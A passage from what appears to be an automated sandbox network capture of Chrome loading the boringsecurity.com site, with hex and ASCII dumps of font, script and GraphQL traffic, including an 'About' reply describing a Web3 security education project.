                                                                          2023-12-10 16:44:52 UTC5930INData Raw: 7a 22 a5 84 f8 1a 59 39 48 5a cf 3b d1 14 13 71 e8 80 ce 32 8f 3d c5 73 6c c5 c7 e7 7a 02 7a 5e 3d 10 e8 c7 53 e7 50 51 3f 4e 5c 70 58 2f 64 e3 d1 59 f9 e5 14 f9 d5 0d 9f 12 5e 51 3c 13 8f 8f 41 4d f3 ca 68 f3 ab 0d 00 b2 fd 94 c1 6c 7c 7a 08 6c 25 2f f3 ec 39 2b 12 fc 47 18 e8 f4 b9 07 21 4b a0 b0 15 a7 8b b1 22 73 e3 32 b9 ca 72 87 43 58 00 ae 2e 05 ac da 23 32 99 c9 25 0d 8a 90 31 5c 58 02 90 a8 90 ca 26 25 94 32 37 81 aa e2 c5 72 02 a6 46 0e 9f 40 a0 e5 60 26 9e 2b 56 a0 2a 64 60 c4 f0 94 94 c4 0b 13 c5 69 d4 87 44 8d 09 59 85 5d 3e 98 d4 71 5a 09 25 39 33 c3 c4 ac b0 00 83 e9 74 a3 45 43 fa 47 0c e5 a4 b0 12 d0 fa 5e 28 21 49 46 4a e1 9a a4 96 02 98 1e c9 a3 cb 27 2a 19 9e 1e a5 25 82 b3 0f 63 21 c7 93 15 84 d4 9a 53 ac ab 07 46 e4 66 35 9d 21 6a 51
                                                                          Data Ascii: z"Y9HZ;q2=slzz^=SPQ?N\pX/dY^Q<AMhl|zl%/9+G!K"s2rCX.#2%1\X&%27rF@`&+V*d`iDY]>qZ%93tECG^(!IFJ'*%c!SFf5!jQ
                                                                          2023-12-10 16:44:52 UTC7116INData Raw: 50 36 1b 63 1b 6f 9f e8 1e 77 76 1e 8c 95 46 2a e8 aa 0a 1b 25 1f 54 56 1e 7e e6 9e 97 9f 74 22 ef 86 c0 63 aa 72 87 cd 41 03 03 4f 47 cf be 00 6f 82 d1 52 d0 92 a3 4b 48 9a b2 2e 82 f8 0c be 0b 89 90 e5 95 76 69 1b d4 65 70 dd 09 b6 c5 69 22 d8 05 40 42 4c f5 34 74 76 48 6d 91 d6 48 26 25 4a 60 13 d0 96 87 2d 73 1b 4c f4 92 61 61 4a 5c a1 34 25 a6 cf 4a 02 72 9c 4b db a3 d0 f5 0a 7a 9c 0a 68 48 4c 06 92 ee e8 f9 e8 48 ba 12 e1 6b 7a 83 2c 32 62 e2 1b 3d 28 05 e9 78 a5 b9 63 3b 88 9c f0 86 cf 4a 06 3a 46 86 9c c2 ad 98 ce e5 71 58 0a 8d a2 52 29 9f 80 a0 e4 71 9c ae 2b 00 50 54 c8 63 d1 82 52 52 b0 c3 47 15 af 90 32 88 d8 39 18 25 45 29 9c 73 f1 58 74 e3 9d 1b 86 24 44 b3 a6 23 9b 2f 16 ab 66 28 6c 54 84 a5 61 76 4f c6 ba 3d 2d 56 ca 54 c8 6c 39 73 f1 7e
                                                                          Data Ascii: P6cowvF*%TV~t"crAOGoRKH.viepi"@BL4tvHmH&%J`-sLaaJ\4%JrKzhHLHkz,2b=(xc;J:FqXR)q+PTcRRG29%E)sXt$D#/f(lTavO=-VTl9s~
                                                                          2023-12-10 16:44:52 UTC8302INData Raw: 9e 12 45 c2 36 9c 05 0c 71 2b 98 90 46 9e 15 c5 a2 09 f8 0a 5a d2 57 9a 01 ca b0 56 11 93 93 f0 14 b5 a4 af 24 83 95 60 b1 23 27 37 08 2a 71 93 b8 94 2f aa c0 16 4d 26 63 40 00 a6 73 28 1d 11 cf 48 5c dd 26 e2 33 53 4a 85 b4 5a 4f cf 49 ba dd 26 ed 69 8a a5 20 38 58 4f cf 48 58 ed 27 ee 70 0b a5 00 3c 58 4d ad 00 81 fc 23 71 c0 2e 94 00 fc 61 37 30 43 5b f8 41 0b c5 05 33 98 ee 32 6e 66 0c 45 22 21 81 40 90 a6 73 9b a6 4b c7 a3 27 a9 62 5c ba 09 f2 89 cd 61 19 27 11 8c 9a b4 8a 7a a8 27 ca 27 0f 58 44 9d ad 0e 6b 27 17 52 28 25 ca 10 33 1d a4 bb 8f 36 6b 26 02 b4 52 45 ce 58 d5 d1 84 c4 34 19 3d b2 03 5a 69 21 e6 80 f4 54 04 cc 0a 40 45 92 19 5a 9e 45 cc c1 f3 56 b2 76 ae a1 2a ae 53 5e 2e 22 e3 d1 f2 5a 91 0f 4d 42 17 54 c6 b7 58 47 c4 63 65 b1 02 9e aa
                                                                          Data Ascii: E6q+FZWV$`#'7*q/M&c@s(H\&3SJZOI&i 8XOHX'p<XM#q.a70C[A32nfE"!@sK'b\a'z''XDk'R(%36k&REX4=Zi!T@EZEVv*S^."ZMBTXGce
                                                                          2023-12-10 16:44:52 UTC6118INData Raw: 73 52 14 2e 8d 0b 8b d0 83 d0 68 50 83 6a 14 56 5e f9 1c cb 76 1c 3b 1a e5 1d 34 a9 dd 6d 42 4f 41 a3 42 4d a8 54 14 0d a6 e6 65 db a8 6e 69 94 14 c8 fd 96 8e 5c 84 03 46 84 eb 50 8d d0 1d 37 2a 68 fd 55 87 7c bc a6 56 ec 1d 8d 30 40 34 9c b0 ab 9e 7e b5 d2 72 0d 1c a8 2b db 29 33 dd bf 0c 4d 30 5e ba 6e 58 51 c9 3f 5a e9 b9 e6 8e 40 28 0e 52 53 33 70 1b 97 c1 7a e4 7e c1 d8 b1 e8 a3 4d ce a3 91 ba 03 91 8a 17 7e 01 5e d8 02 99 5b 90 c4 be 08 06 9b 93 a8 c7 9f ad 72 31 05 dc 80 57 b6 1c a6 0d f8 62 5f 04 0b a6 e4 8a 31 27 eb 5d 36 20 d1 c8 05 01 ca 4c f1 6e 01 05 f0 5e b9 1c 90 ec 58 fd 6a 34 d8 ea 39 1b a0 39 58 a1 66 e0 11 db 32 76 5c 8b dc ea 27 46 c8 9c 06 4e cb 91 4b 90 a1 b1 04 1c 13 a6 aa 75 39 17 f0 e9 ca e4 4e e4 27 7f 80 39 dd 7a 6a 27 46 c8 9c
                                                                          Data Ascii: sR.hPjV^v;4mBOABMTeni\FP7*hU|V0@4~r+)3M0^nXQ?Z@(RS3pz~M~^[r1Wb_1']6 Ln^Xj499Xf2v\'FNKu9N'9zj'F
                                                                          2023-12-10 16:44:52 UTC10674INData Raw: 74 89 e2 9f b3 69 fe ad 52 78 03 8d fe 12 df 80 38 c4 03 a6 49 0f fb 36 91 ea 6d c9 df e6 1f a9 72 55 40 e3 11 ce 99 2c ad fb 37 fb a2 78 d6 3c 9c 87 a3 55 8a a8 00 62 32 37 65 ff 00 a2 7f 3a 0c 78 b9 ec da 27 ab 5d 88 50 38 df 90 7b 7e bf fd 23 9d 06 25 6c 7b 3e f3 b7 56 f4 93 c0 fc 65 3d 0d 1b aa 81 c6 23 9d 16 2e b4 3d db 79 9b 8d e9 62 4e 9b 74 6b 31 44 03 8d c6 9b f7 56 25 c9 fc ef 33 1e 3d 2c 59 b4 1b a3 fa 18 aa 01 c6 fc 82 1f 95 3c b1 20 1d e7 72 cb e8 62 ef bc cd d5 bd 4c 40 1f 8c a4 a1 a3 f5 5c 47 3a 0e 5d 2a c5 df 79 5b 83 ea 62 77 f9 a6 df 5b 59 8a 20 1c 6e 34 9b ba b3 17 63 f9 de 56 3c 7a 58 b3 68 b7 47 f4 31 54 00 0d fe 10 fc a9 25 89 1c ef 3b 96 5f 41 ec fb ce dd 5b d2 c4 28 fc 60 4a 97 6e 17 8c 47 3a 2c 59 6a 7b be f3 9e 0f a0 9d fe 65 3d
                                                                          Data Ascii: tiRx8I6mrU@,7x<Ub27e:x']P8{~#%l{>Ve=#.=ybNtk1DV%3=,Y< rbL@\G:]*y[bw[Y n4cV<zXhG1T%;_A[(`JnG:,Yj{e=


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          115192.168.2.54984875.2.60.54435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:44:51 UTC520OUTGET /parseGridNftDataToCanvas.worker.js HTTP/1.1
                                                                          Host: boringsecurity.com
                                                                          Connection: keep-alive
                                                                          Origin: https://boringsecurity.com
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: same-origin
                                                                          Sec-Fetch-Dest: worker
                                                                          Referer: https://boringsecurity.com/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          If-None-Match: "0922e34df9afec7660bfdaeb43061ea3-ssl"
                                                                          2023-12-10 16:44:52 UTC322INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 34 20 4e 6f 74 20 4d 6f 64 69 66 69 65 64 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 75 62 6c 69 63 2c 6d 61 78 2d 61 67 65 3d 30 2c 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 0d 0a 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 22 4e 65 74 6c 69 66 79 20 45 64 67 65 22 3b 20 68 69 74 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 34 3a 35 32 20 47 4d 54 0d 0a 45 74 61 67 3a 20 22 30 39 32 32 65 33 34 64 66 39 61 66 65 63 37 36 36 30 62 66 64 61 65 62 34 33 30 36 31 65 61 33 2d 73 73 6c 22 0d 0a 53 65 72 76 65 72 3a 20 4e 65 74 6c 69 66 79 0d 0a 53 74 72 69 63 74 2d 54 72 61 6e 73 70 6f 72 74 2d 53 65 63 75 72 69 74 79 3a 20 6d 61 78 2d 61 67 65 3d 33 31 35 33 36 30 30 30 0d
                                                                          Data Ascii: HTTP/1.1 304 Not ModifiedCache-Control: public,max-age=0,must-revalidateCache-Status: "Netlify Edge"; hitDate: Sun, 10 Dec 2023 16:44:52 GMTEtag: "0922e34df9afec7660bfdaeb43061ea3-ssl"Server: NetlifyStrict-Transport-Security: max-age=31536000


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          116192.168.2.54984975.2.60.54435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:44:52 UTC608OUTGET /fonts/gunplay.woff2 HTTP/1.1
                                                                          Host: boringsecurity.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          Origin: https://boringsecurity.com
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: font
                                                                          Referer: https://boringsecurity.com/_next/static/css/ad4aef9984e4c1fd.css
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:44:52 UTC395INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 67 65 3a 20 35 30 39 32 35 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 75 62 6c 69 63 2c 6d 61 78 2d 61 67 65 3d 30 2c 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 0d 0a 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 22 4e 65 74 6c 69 66 79 20 45 64 67 65 22 3b 20 68 69 74 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 38 38 37 32 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 66 6f 6e 74 2f 77 6f 66 66 32 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 34 3a 35 32 20 47 4d 54 0d 0a 45 74 61 67 3a 20 22 30 38 34 37 32 33 37 34 39 30 31 37 66 33 65 31 30 35 31 32 66 39 37 33 32 61 65
                                                                          Data Ascii: HTTP/1.1 200 OKAccept-Ranges: bytesAge: 50925Cache-Control: public,max-age=0,must-revalidateCache-Status: "Netlify Edge"; hitContent-Length: 18872Content-Type: font/woff2Date: Sun, 10 Dec 2023 16:44:52 GMTEtag: "084723749017f3e10512f9732ae
                                                                          2023-12-10 16:44:52 UTC791INData Raw: 77 4f 46 32 00 01 00 00 00 00 49 b8 00 12 00 00 00 00 b5 00 00 00 49 50 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3f 46 46 54 4d 1c 1a 2a 1b 9a 10 1c 6c 06 60 00 83 5a 08 2c 09 84 65 11 08 0a 82 a5 58 82 81 1b 0b 83 4c 00 01 36 02 24 03 87 14 04 20 05 89 6e 07 85 33 0c 81 5e 1b bc 9f 35 6c 9b 4e 3d bb 5b 55 05 13 b2 14 99 8d a8 60 e3 40 80 78 36 9c 19 08 36 0e 80 78 bb 94 ec ff ff 98 dc 18 43 7a 50 ab 6e 88 39 2b 99 61 77 d7 54 28 2c 38 55 15 e4 94 67 19 59 a8 6a a8 da 3b 08 b9 4f c6 0f e9 b9 1c b3 d9 f1 62 82 98 d0 44 98 53 41 8d 3d b0 8e d8 81 70 99 7e 2e f2 8b e5 83 9b 1c 68 b8 f4 82 1b b6 89 82 1d 4c 7e 88 b4 61 5e 0a 6a cc 8b 62 15 c4 2e 72 f0 bc b7 46 b6 88 34 20 11 91 0a b2 9e 9a 4b fd 21 c3 85 5c cc f6 8d f3 eb 2f 88
                                                                          Data Ascii: wOF2IIP?FFTM*l`Z,eXL6$ n3^5lN=[U`@x66xCzPn9+awT(,8UgYj;ObDSA=p~.hL~a^jb.rF4 K!\/
                                                                          2023-12-10 16:44:52 UTC2372INData Raw: 44 75 13 02 d5 00 45 10 00 b5 23 50 eb 24 8d 13 77 a7 64 c6 72 9d dc cc 79 ef 82 2c d9 bd 68 83 fc 6c 78 56 fb bd 38 7b 88 e0 13 2c 49 d0 e0 05 10 91 69 3f 7b ee 67 7d 06 db 96 d2 38 44 44 18 71 8e 6d 24 e7 95 fc fb de 25 53 6b 70 d2 b9 98 fb 96 56 28 06 81 2a a8 ac 60 57 32 7f 8b 6c d6 71 2f ec 94 13 51 c4 db 02 ab 25 4d 60 eb 0e 80 44 d0 b3 a4 d7 6f 7b 34 ae 93 c8 11 03 6f d0 57 5c ec 22 b0 72 58 03 08 a6 58 2f 51 c6 f4 72 eb 3d 41 44 92 7a db 94 06 63 b0 17 8f 72 d2 00 34 0c 47 50 61 cf 9f 65 5d 7b 80 33 0d 42 be 2d 2f b8 81 5b 20 58 5c 91 d4 cf 3b bc e9 c3 2e a9 b6 ef d9 f4 c1 56 08 e6 61 29 e8 af 11 fa c1 18 d6 31 d8 e1 17 bc 61 19 11 12 31 91 d8 3f 37 12 5d 2a 72 0f 49 27 41 21 03 2a 19 f1 0c fa c6 a2 df fb 49 59 79 34 7e b2 9e 3f 0c c4 69 f1 e9 45
                                                                          Data Ascii: DuE#P$wdry,hlxV8{,Ii?{g}8DDqm$%SkpV(*`W2lq/Q%M`Do{4oW\"rXX/Qr=ADzcr4GPae]{3B-/[ X\;.Va)1a1?7]*rI'A!*IYy4~?iE
                                                                          2023-12-10 16:44:52 UTC538INData Raw: 77 8e 45 2b 2c a5 19 98 02 82 88 21 6d 74 5f ab 7a c4 c6 2b 51 5b 34 3a 1c 1a 4e 33 ba 9c 54 aa 06 f2 e5 9c bd 92 c8 84 e5 36 9e 06 86 0b 95 4a 16 c6 19 a9 da 9d c5 e4 9a 40 ab 6e 87 8c d2 1e 91 c2 68 fb 54 65 e8 c3 35 c7 9c bb 18 36 ad b5 18 78 e1 23 ec 15 91 f4 ba c8 50 a9 71 40 57 b1 57 da 76 49 51 17 e3 52 04 ce 42 e7 48 78 e1 27 84 fd b7 07 36 ef 58 0b d3 53 3a 13 43 50 87 21 c1 8c ff 4b a3 46 c5 25 7b 93 96 ac 0a 71 32 6e 61 45 f3 89 a7 eb da 72 0e 6b ec 5c 1c 4f 06 e2 34 5d e4 e7 6f 77 8f 8b b4 9f 88 ef 8b 1e 77 e4 56 cb 4d 5d 9e 8e 6b 09 f1 57 9e da 13 fd 66 e9 ae 1b 75 50 32 f4 92 35 6b 7b a2 67 59 9c 6e 8f b7 c4 d1 3c 4d b2 2d 39 b2 24 c1 10 08 25 63 ad 24 8b 28 c7 10 48 b2 88 0d 15 99 bf 96 21 5a 18 59 21 fe 3b 28 07 1c 3b 53 fe 2b bc da c2 c6
                                                                          Data Ascii: wE+,!mt_z+Q[4:N3T6J@nhTe56x#Pq@WWvIQRBHx'6XS:CP!KF%{q2naErk\O4]owwVM]kWfuP25k{gYn<M-9$%c$(H!ZY!;(;S+
                                                                          2023-12-10 16:44:52 UTC4744INData Raw: 14 92 f7 2a 89 a3 ca 2b 44 ef c2 57 7b 6a fe e8 7a 03 9b d8 ed f3 13 91 a1 2e 56 23 20 40 a7 86 0a 78 fd 44 31 bc d5 c9 29 63 b1 6f 09 cf f9 dc a5 09 7a 35 5a 17 60 38 52 89 e6 94 05 d1 58 95 57 6b 94 64 65 ff 5d 12 f8 da 27 58 35 75 4f 6a d7 6d 39 eb ab f6 e5 9a f7 8c a5 d2 83 c6 27 17 21 af 50 e1 0d 74 a1 97 5e ec 33 7a 64 51 39 29 6a 1b 18 72 e5 74 1c 5f 8b 48 60 08 16 f9 97 c8 2a de 19 c2 da 0b 82 f7 c4 11 e9 68 c6 dd 33 d9 fc 05 e4 67 f5 ca ab 9e 29 6d 66 dd bd a9 f7 49 ff 87 e5 c8 7f 83 41 58 9e 27 0a 6d 2b 9b f2 c4 90 7f 20 81 7c e5 15 39 7f 91 a2 4f 0c e8 55 71 fa 1c a1 fd b3 b4 8a 83 19 ef 41 c5 4a ba e2 27 a8 f7 ba 89 fb d2 55 f2 1c 21 0c 83 2a 09 0c 95 2a 26 a3 b0 f0 56 dd 4f 7b d5 ae 1d 91 81 aa e2 58 65 6e 34 06 5a b5 bc 63 8d b3 0e 5a ba 6e
                                                                          Data Ascii: *+DW{jz.V# @xD1)coz5Z`8RXWkde]'X5uOjm9'!Pt^3zdQ9)jrt_H`*h3g)mfIAX'm+ |9OUqAJ'U!**&VO{Xen4ZcZn
                                                                          2023-12-10 16:44:52 UTC5930INData Raw: 08 6b cd 6b 8a 6b d6 90 87 fd b8 c4 e2 f7 4d 0b c9 f8 38 43 b2 b9 19 a6 18 3f 21 31 df 5c 67 54 f2 90 45 e5 ef eb 68 3e e3 64 5b 26 72 6e 0e 95 d1 d2 86 ce f2 d1 19 c8 96 c6 2c f4 3c f5 cb 6c 6e 41 65 3e 29 32 51 74 43 1f 97 5a cc d3 70 4c 5c b4 38 1c b5 54 23 77 59 6e 09 8a 71 40 05 b1 74 02 03 94 1b e5 97 ee a1 66 fa 06 23 74 d8 50 90 43 fd af 90 76 88 f8 bc ec 96 5a 03 97 cc 65 5a 40 a1 27 34 d7 6d 0f fc 19 0c 20 b4 15 ff 0c 34 7a f5 ee c7 83 0d a4 db 04 cb 23 11 ed 9b 14 49 38 74 da b9 df 6b 7d 63 dd ee 8e 07 1b 67 9d 53 13 88 ed 3b e1 2a 98 ea 37 ff 0a bf b8 00 38 55 21 f2 9f 96 c8 a6 b8 22 d1 34 b7 46 c6 9d 16 c5 71 a7 3c 9e e6 42 2c e4 9a f7 9f 8a 8a 16 38 37 a4 24 37 38 f3 04 2e 26 25 c5 b1 81 c7 13 20 c5 c6 6b 70 14 c2 56 7b 91 e1 58 e5 a8 f4 39
                                                                          Data Ascii: kkkM8C?!1\gTEh>d[&rn,<lnAe>)2QtCZpL\8T#wYnq@tf#tPCvZeZ@'4m 4z#I8tk}cgS;*78U!"4Fq<B,87$78.&% kpV{X9
                                                                          2023-12-10 16:44:52 UTC4497INData Raw: 51 6b 69 0d 73 c8 4b b8 d8 77 68 3c 8b 88 90 8f d1 67 98 67 50 53 98 56 3d 6a d0 05 35 52 0c 53 ba 58 a9 7b 98 c3 b5 ad 55 0e ca 0f 15 b9 2d b2 0d a3 79 13 dc bf 6b b8 4a cb 3c 2a 99 fd e8 14 4a 84 a6 46 42 a3 da 95 e6 22 44 17 88 75 b4 1a dc 2f 1f 97 2e 90 7b bc 9e 9a 71 c8 25 0a 0c dc e0 17 b1 97 8c 50 6a 5f 55 4c 00 29 2e 6d 18 49 a9 f2 81 05 08 80 16 07 e3 d6 68 eb 2c df 5a b0 a6 ce 54 2c ad 1d 32 9b 28 cb a5 b2 66 b2 33 e9 81 b9 91 39 00 d4 c5 79 82 05 d2 3e b0 2f ac 32 8b 56 88 a9 ea 3c d8 1b 2c 59 d0 35 0c 6a 98 2e 0a 15 49 c8 12 38 17 c2 dd f6 b9 6f 79 37 df c2 63 19 f3 99 95 05 e7 87 a1 43 78 1f d3 ed 06 94 8b 92 fb c1 14 ea ed 8b 16 4c 8c 79 0a c8 d1 02 82 45 42 2b 99 27 34 11 0c b1 57 6b 0f 51 a5 65 75 93 14 42 46 6b 9a 41 13 59 0e 1f 8f 13 2e
                                                                          Data Ascii: QkisKwh<ggPSV=j5RSX{U-ykJ<*JFB"Du/.{q%Pj_UL).mIh,ZT,2(f39y>/2V<,Y5j.I8oy7cCxLyEB+'4WkQeuBFkAY.


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          117192.168.2.54985023.92.19.1444435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:44:52 UTC520OUTOPTIONS /graphql/ HTTP/1.1
                                                                          Host: cms.boringsecurity.com
                                                                          Connection: keep-alive
                                                                          Accept: */*
                                                                          Access-Control-Request-Method: POST
                                                                          Access-Control-Request-Headers: content-type
                                                                          Origin: https://boringsecurity.com
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Site: same-site
                                                                          Sec-Fetch-Dest: empty
                                                                          Referer: https://boringsecurity.com/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:44:52 UTC392INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 34 20 4e 6f 20 43 6f 6e 74 65 6e 74 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 34 3a 35 38 20 47 4d 54 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 56 61 72 79 3a 20 4f 72 69 67 69 6e 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 68 74 74 70 73 3a 2f 2f 62 6f 72 69 6e 67 73 65 63 75 72 69 74 79 2e 63 6f 6d 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 43 72 65 64 65 6e 74 69 61 6c 73 3a 20 74 72 75 65 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 4d 61 78 2d 41 67 65 3a 20 33 31 35 33 36 30 30 30 0d 0a 41 63 63 65 73 73 2d
                                                                          Data Ascii: HTTP/1.1 204 No ContentServer: nginx/1.18.0Date: Sun, 10 Dec 2023 16:44:58 GMTConnection: closeVary: OriginAccess-Control-Allow-Origin: https://boringsecurity.comAccess-Control-Allow-Credentials: trueAccess-Control-Max-Age: 31536000Access-


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          118192.168.2.54985123.92.19.1444435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:44:52 UTC617OUTPOST /graphql/ HTTP/1.1
                                                                          Host: cms.boringsecurity.com
                                                                          Connection: keep-alive
                                                                          Content-Length: 298
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          accept: */*
                                                                          content-type: application/json
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Origin: https://boringsecurity.com
                                                                          Sec-Fetch-Site: same-site
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Referer: https://boringsecurity.com/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:44:52 UTC298OUTData Raw: 7b 22 6f 70 65 72 61 74 69 6f 6e 4e 61 6d 65 22 3a 22 47 65 74 41 62 6f 75 74 22 2c 22 76 61 72 69 61 62 6c 65 73 22 3a 7b 22 6c 6f 63 61 6c 65 22 3a 22 65 6e 22 7d 2c 22 71 75 65 72 79 22 3a 22 71 75 65 72 79 20 47 65 74 41 62 6f 75 74 28 24 6c 6f 63 61 6c 65 3a 20 49 31 38 4e 4c 6f 63 61 6c 65 43 6f 64 65 29 20 7b 5c 6e 20 20 61 62 6f 75 74 28 6c 6f 63 61 6c 65 3a 20 24 6c 6f 63 61 6c 65 29 20 7b 5c 6e 20 20 20 20 64 61 74 61 20 7b 5c 6e 20 20 20 20 20 20 61 74 74 72 69 62 75 74 65 73 20 7b 5c 6e 20 20 20 20 20 20 20 20 74 69 74 6c 65 5c 6e 20 20 20 20 20 20 20 20 64 65 73 63 72 69 70 74 69 6f 6e 5c 6e 20 20 20 20 20 20 20 20 6c 6f 63 61 6c 65 5c 6e 20 20 20 20 20 20 20 20 5f 5f 74 79 70 65 6e 61 6d 65 5c 6e 20 20 20 20 20 20 7d 5c 6e 20 20 20 20 20 20
                                                                          Data Ascii: {"operationName":"GetAbout","variables":{"locale":"en"},"query":"query GetAbout($locale: I18NLocaleCode) {\n about(locale: $locale) {\n data {\n attributes {\n title\n description\n locale\n __typename\n }\n
                                                                          2023-12-10 16:44:52 UTC1027INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 34 3a 35 38 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 35 34 30 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 56 61 72 79 3a 20 4f 72 69 67 69 6e 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 68 74 74 70 73 3a 2f 2f 62 6f 72 69 6e 67 73 65 63 75 72 69 74 79 2e 63 6f 6d 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 43 72 65 64 65 6e 74 69 61 6c 73 3a 20 74 72
                                                                          Data Ascii: HTTP/1.1 200 OKServer: nginx/1.18.0Date: Sun, 10 Dec 2023 16:44:58 GMTContent-Type: application/jsonContent-Length: 540Connection: closeVary: OriginAccess-Control-Allow-Origin: https://boringsecurity.comAccess-Control-Allow-Credentials: tr
                                                                          2023-12-10 16:44:52 UTC540INData Raw: 7b 22 64 61 74 61 22 3a 7b 22 61 62 6f 75 74 22 3a 7b 22 64 61 74 61 22 3a 7b 22 61 74 74 72 69 62 75 74 65 73 22 3a 7b 22 74 69 74 6c 65 22 3a 22 42 6f 72 69 6e 67 20 53 65 63 75 72 69 74 79 22 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 3c 70 3e 45 76 65 72 79 64 61 79 20 70 65 6f 70 6c 65 20 61 72 65 20 62 65 69 6e 67 20 61 74 74 61 63 6b 65 64 20 61 6e 64 20 73 63 61 6d 6d 65 64 20 69 6e 20 57 65 62 33 2e 26 6e 62 73 70 3b 3c 2f 70 3e 3c 70 3e 57 65 20 73 74 61 72 74 65 64 20 42 6f 72 69 6e 67 20 53 65 63 75 72 69 74 79 20 74 6f 20 65 64 75 63 61 74 65 20 70 65 6f 70 6c 65 20 6f 6e 20 77 68 61 74 20 74 68 65 79 20 63 61 6e 20 64 6f 20 74 6f 20 72 65 6d 61 69 6e 20 73 61 66 65 20 69 6e 20 74 68 69 73 20 65 76 65 72 2d 65 76 6f 6c 76 69 6e 67 20 73
                                                                          Data Ascii: {"data":{"about":{"data":{"attributes":{"title":"Boring Security","description":"<p>Everyday people are being attacked and scammed in Web3.&nbsp;</p><p>We started Boring Security to educate people on what they can do to remain safe in this ever-evolving s


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          119192.168.2.54985223.92.19.1444435756C:\Program Files\Google\Chrome\Application\chrome.exe
